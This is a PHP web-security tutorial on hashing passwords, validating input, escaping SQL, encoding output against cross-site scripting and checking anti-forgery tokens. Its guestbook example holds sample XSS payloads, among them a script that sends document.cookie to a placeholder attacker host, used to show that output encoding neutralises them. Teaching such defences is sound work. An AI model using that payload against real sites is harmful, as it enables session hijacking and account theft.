Storing Passwords
Never store a password as clear text or in any form that can be
decrypted; store only a one-way hash of it. Think of the hash function
as one-way: the hash can be computed from the password, but the
password cannot be recovered from the hash. Hashing in the browser
with JavaScript (MD5 routines are available at this site) is not a
substitute for HTTPS: whatever the client sends, hashed or not, becomes
the credential the server accepts, and anyone who can read the traffic
can replay it. Use HTTPS and hash on the server. Plain MD5 is not a
suitable password hash in any case, since it is fast and unsalted. On
the server side use PHP's password_hash()/password_verify(), or crypt()
with an explicit salt as shown here, and compare the stored hash with
the hash of the user's input.
// crypt() must be given a salt (PHP 8 refuses to run without one). This builds
// a bcrypt salt ($2y$, cost 10) from random bytes; password_hash() does the
// same thing for you on PHP 5.5 and later.
$salt = '$2y$10$' . substr(strtr(base64_encode(random_bytes(16)), '+', '.'), 0, 22);
$password = crypt('mypassword', $salt);
// store the hashed password in a file or database, never the plain text

// when the user logs in, hash the input with the salt embedded in the stored
// hash and compare the two hashes in constant time
$user_input = $_POST['password'] ?? '';
if (hash_equals($password, crypt($user_input, $password))) {
    echo "Password verified";
}
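The same store-and-verify flow written with password_hash() and password_verify(), which choose the salt and algorithm for you, as an added example that is not part of the original page. The $users array is a hypothetical stand-in for a database table, and the usernames and passwords are constructed sample data.

```php
<?php
// Added example, not from the original page: registration and login with
// password_hash()/password_verify(). $users stands in for a database table.
declare(strict_types=1);

$users = []; // hypothetical store: username => password hash

function register(array &$users, string $username, string $password): void
{
    // password_hash() picks a random salt and embeds algorithm, cost and salt
    // in the result, so nothing else has to be stored next to it.
    $users[$username] = password_hash($password, PASSWORD_DEFAULT);
}

function login(array &$users, string $username, string $password): bool
{
    // Verify against a throwaway hash when the user is unknown, so the time
    // taken does not reveal which usernames exist.
    $known = isset($users[$username]);
    $hash  = $known ? $users[$username] : password_hash('placeholder', PASSWORD_DEFAULT);
    if (!password_verify($password, $hash) || !$known) {
        return false;
    }
    // If the default cost or algorithm has been raised since this hash was
    // made, replace it now while the plain text is available.
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        $users[$username] = password_hash($password, PASSWORD_DEFAULT);
    }
    return true;
}

// constructed sample data
register($users, 'alice', 'correct horse battery staple');
var_dump(login($users, 'alice', 'correct horse battery staple'));
var_dump(login($users, 'alice', 'wrong password'));
var_dump(login($users, 'nobody', 'anything'));
```

The first login() call returns true and the other two return false; the unknown user is rejected only after a real password_verify() has run, so it costs the same time as a wrong password for a known user.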
Do Not Trust Input Data
Input data will be coming in through forms. Check it twice: on the client side with JavaScript, which is a convenience for the user and nothing more, and on the server side with PHP, which is the only check an attacker cannot bypass (the client-side check disappears as soon as someone saves the page and edits it, or posts directly with a script). Always put an upper limit on the amount of data you are willing to accept, and check it on both sides. Define which characters are acceptable to you, such as alphanumerics, and enforce that with a regular expression. Stripping unwanted characters, as purge() below does, is convenient but silently changes the input; for most fields it is better to reject invalid input with an error.
function purge($str) {
    // Remove every character that is not a letter, digit or underscore (\W).
    // Without the /u modifier this is ASCII-only; accented letters are removed too.
    return preg_replace('/\W/', '', $str);
}
$username = purge($_POST['username']);
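A server-side validator that applies both checks from the paragraph above, a length cap and a character whitelist per field, and rejects bad input instead of rewriting it, as an added example that is not part of the original page. The field names, limits and patterns are hypothetical, and the two input arrays are constructed sample data standing in for $_POST.

```php
<?php
// Added example, not from the original page: length cap plus whitelist regex
// per field, rejecting rather than silently fixing. Rules are hypothetical.
declare(strict_types=1);

const MAX_BODY_BYTES = 4096; // hypothetical cap on the whole request body

$rules = [
    // field     => [max length, allowed pattern]
    // \z (not $) anchors at the very end: $ would also match before a trailing newline.
    'username' => [32,  '/^[A-Za-z0-9_]+\z/'],
    'email'    => [254, '/^[^\s@]+@[^\s@]+\.[A-Za-z]{2,}\z/'],
    'zip'      => [10,  '/^[0-9]{5}(-[0-9]{4})?\z/'],
];

/** Returns field => error message; an empty array means the input is acceptable. */
function validate(array $rules, array $input): array
{
    $errors = [];
    foreach ($rules as $field => [$maxLen, $pattern]) {
        if (!isset($input[$field]) || !is_string($input[$field])) {
            $errors[$field] = 'missing';
            continue;
        }
        $value = $input[$field];
        // Length first: an oversized value should never reach the regex engine.
        if (strlen($value) > $maxLen) {
            $errors[$field] = 'too long';
            continue;
        }
        // preg_match() returns false on an engine error (e.g. backtrack limit),
        // so test for exactly 1 and treat anything else as a failure.
        if (preg_match($pattern, $value) !== 1) {
            $errors[$field] = 'contains disallowed characters';
        }
    }
    return $errors;
}

// In a real request, reject an oversized body before reading any field:
// if ((int)($_SERVER['CONTENT_LENGTH'] ?? 0) > MAX_BODY_BYTES) { http_response_code(413); exit; }

// constructed sample inputs
$good = ['username' => 'bob_99', 'email' => 'bob@example.com', 'zip' => '12345'];
$bad  = ['username' => "bob<script>", 'email' => 'not an address', 'zip' => str_repeat('9', 40)];

print_r(validate($rules, $good)); // empty array: every field passed
print_r(validate($rules, $bad));  // one error per field, zip reported as too long
```

Only after validate() returns an empty array should a field be used; at that point $username is known to match the whitelist, which is a stronger guarantee than having had unknown characters removed from it.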
Prevent SQL Injection
In a SQL Injection attack, a user sends data through a form that ends up
inside the text of a SQL query, so that a carefully chosen value (a single
quote, a comment marker, an extra clause) changes what the query does.
If you build queries from strings, pass every user-supplied value through
PHP's built-in mysqli_real_escape_string() before inserting it. The function
escapes special characters such as single and double quotes so that MySQL
treats them as data inside a quoted literal rather than as syntax. It only
protects values that sit between quotes in the query text: a number, a
column name or an ORDER BY or LIMIT clause built from user input is still
injectable, and the escaping is only correct for the connection's character
set. Prepared statements with bound parameters (mysqli_prepare() with
bind_param()) keep the query and the data separate by design and are the
preferred fix; treat escaping as the fallback for a query that cannot be
parameterised.
// mysqli_connect() takes the database name as its fourth argument and the port as the fifth
$link = mysqli_connect($host, $user, $password, $database, $port);
$formUser = mysqli_real_escape_string($link, $_POST['user']);
$pwd      = mysqli_real_escape_string($link, $_POST['pwd']);
// escaping only helps when the value is placed inside quotes in the query text
$sql = "SELECT id FROM users WHERE name = '$formUser'";
Cross-site Scripting (XSS)
A cross-site scripting attack allows a malicious user to enter information
in a form that then runs as client-side script in other users' browsers.
Alice has joined an online dating service. In the section "Describe Your
Ideal Date" she posts her answer together with a short script enclosed
in script tags. When Bob visits her profile, the script text does not
show up in his browser, but it runs on Bob's machine in the context of the
site. The script then sends Bob's real name, e-mail address and session
cookie to Alice, who can use the cookie to act as Bob.
If you are accepting user input, such as comments to a guestbook, that you then show to other users, make sure it cannot be interpreted as HTML. Two PHP functions help. strip_tags() removes tags from the input; note that it keeps the attributes of any tags you choose to allow, so an allowed <a> can still carry an onclick handler. htmlentities() or htmlspecialchars() encodes <, >, & and quotes so that the browser displays them literally. Encoding at output time is the step that actually stops the script from running; stripping on input is an optional extra, and it loses the user's text. Always pass ENT_QUOTES and the character set, since an unencoded quote is enough to break out of an attribute value.
$comment = strip_tags($_POST['comments']); // optional: remove tags on the way in
// now store in file or database
// when displaying that comment in someone else's browser, encode it for HTML
echo htmlentities($comment, ENT_QUOTES, 'UTF-8');
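A guestbook renderer that stores user text untouched and encodes it at the point of output, covering both the HTML body and a quoted attribute, as an added example that is not part of the original page. The entries, including Alice's two payloads, are constructed sample data, and the attacker.example host is a placeholder.

```php
<?php
// Added example, not from the original page: encode user text at output time,
// once per output context. The entries below are constructed sample data.
declare(strict_types=1);

function e(string $s): string
{
    // Safe for HTML body text and for double- or single-quoted attribute values.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string,
    // so a malformed comment is still displayed rather than silently dropped.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderEntry(array $entry): string
{
    // 'name' is emitted inside a quoted attribute and in the body; 'text' in the
    // body. Every interpolation goes through e(), and nl2br() runs after it so
    // the <br /> tags it adds are the only markup that survives.
    return '<li data-author="' . e($entry['name']) . '">'
         . '<b>' . e($entry['name']) . '</b>: ' . nl2br(e($entry['text']))
         . "</li>\n";
}

$entries = [
    ['name' => 'Bob', 'text' => "Nice site!\nSee you soon."],
    // Alice's payloads: an attribute breakout in the name, a script tag in the text.
    ['name' => 'Alice" onmouseover="alert(document.cookie)',
     'text' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'],
];

echo "<ul>\n";
foreach ($entries as $entry) {
    echo renderEntry($entry);
}
echo "</ul>\n";
```

In the output, Alice's name ends up as data-author="Alice&quot; onmouseover=&quot;..." and her script tag appears on the page as visible text, because every quote and angle bracket was encoded before the browser saw it.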
Remote Form Posting
Anyone can visit a Web site, use File->Save As in his browser
and make a local copy of the form. He can then change the action
attribute to point to the fully qualified URL, alter the form fields and
their values, remove any JavaScript checks, and click the Submit button.
The server will accept this form data as legitimate, because nothing in
an HTTP request proves which page it was sent from. The same trick lets
a third-party page submit the form on behalf of a logged-in victim who
merely visits it (cross-site request forgery).
To handle remote form posting, generate a token from a cryptographically random value (random_bytes(); a timestamp on its own is guessable) and place that token both in a Session variable and in a hidden field of the form. When the form is submitted, check that the two tokens match, using hash_equals() for the comparison. The token changes each time the form is created, so a would-be attacker cannot make a permanent copy of your Web form that posts unwanted requests to your application, and cannot forge a request on another user's behalf without first reading that user's token.
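The token scheme above in full, one script that both issues the form and checks the submission, as an added example that is not part of the original page. The form action, field names and messages are hypothetical.

```php
<?php
// Added example, not from the original page: per-form anti-forgery token kept
// in the session and checked on submission. Field and action names are
// hypothetical.
declare(strict_types=1);
session_start();

function csrfToken(): string
{
    // random_bytes() is a CSPRNG, so the token cannot be predicted from the time.
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    return $_SESSION['csrf_token'];
}

function csrfCheck(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? null;
    unset($_SESSION['csrf_token']);      // single use: a replayed copy of the form fails
    if ($expected === null || $submitted === null) {
        return false;
    }
    return hash_equals($expected, $submitted); // constant-time comparison
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrfCheck($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Form token missing or invalid');
    }
    // ... the submission is genuine: validate the fields and save them here ...
    exit('Saved');
}

// GET: render the form with a fresh token. A saved copy of this page, or a
// form on another site, cannot contain a token that matches the visitor's
// session, so its POST is refused above.
$token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="post" action="/profile.php">
  <input type="hidden" name="csrf_token" value="$token">
  <input type="text" name="comments" maxlength="500">
  <button type="submit">Submit</button>
</form>
HTML;
```

Because the token is stored in the session rather than derived from anything the attacker can see, the check does not depend on the Referer header, which browsers and proxies may strip.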